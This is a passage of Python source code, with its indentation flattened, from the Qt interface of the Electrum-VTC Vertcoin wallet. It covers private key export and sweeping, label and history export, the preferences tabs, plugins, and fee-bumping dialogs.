from electrum_vtc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-vtc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
d.emit(SIGNAL('computing_privkeys'))
d.emit(SIGNAL('show_privkeys'))
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
f = open(labelsFile, 'r')
data = f.read()
f.close()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum-vtc_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error), reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-vtc-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error), reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = QTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet(BLACK_FG if get_address() else RED_FG)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
try:
tx = self.wallet.sweep(get_pk(), self.network, self.config, get_address(), None)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
self.show_transaction(tx)
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_vtc.i18n import languages
lang_combo.addItems(languages.values())
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = languages.keys()[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
update_maxfee()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
def on_maxfee(x):
m = maxfee_e.get_amount()
if m: self.config.set_key('max_fee_rate', m)
self.fee_slider.update()
def update_maxfee():
d = self.config.is_dynfee()
maxfee_e.setDisabled(d)
maxfee_label.setDisabled(d)
maxfee_label = HelpLabel(_('Max static fee'), _('Max value of the static fee slider'))
maxfee_e = BTCkBEdit(self.get_decimal_point)
maxfee_e.setAmount(self.config.max_fee_rate())
maxfee_e.textChanged.connect(on_maxfee)
update_maxfee()
fee_widgets.append((maxfee_label, maxfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
rbf_policy = self.config.get('rbf_policy', 2)
rbf_label = HelpLabel(_('Propose Replace-By-Fee') + ':', '')
rbf_combo = QComboBox()
rbf_combo.addItems([_('Always'), _('If the fee is low'), _('Never')])
rbf_combo.setCurrentIndex(rbf_policy)
def on_rbf(x):
self.config.set_key('rbf_policy', x)
rbf_combo.currentIndexChanged.connect(on_rbf)
fee_widgets.append((rbf_label, rbf_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.connect(self, SIGNAL('alias_received'), set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['VTC', 'mVTC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1VTC=1000mVTC.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'VTC':
self.decimal_point = 8
elif unit_result == 'mVTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_vtc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", str(qr_combo.itemData(x).toString()), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_currencies()
update_history_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
cb.setEnabled(plugins.is_available(name, self.wallet))
cb.setChecked(p is not None and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(i+1,1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.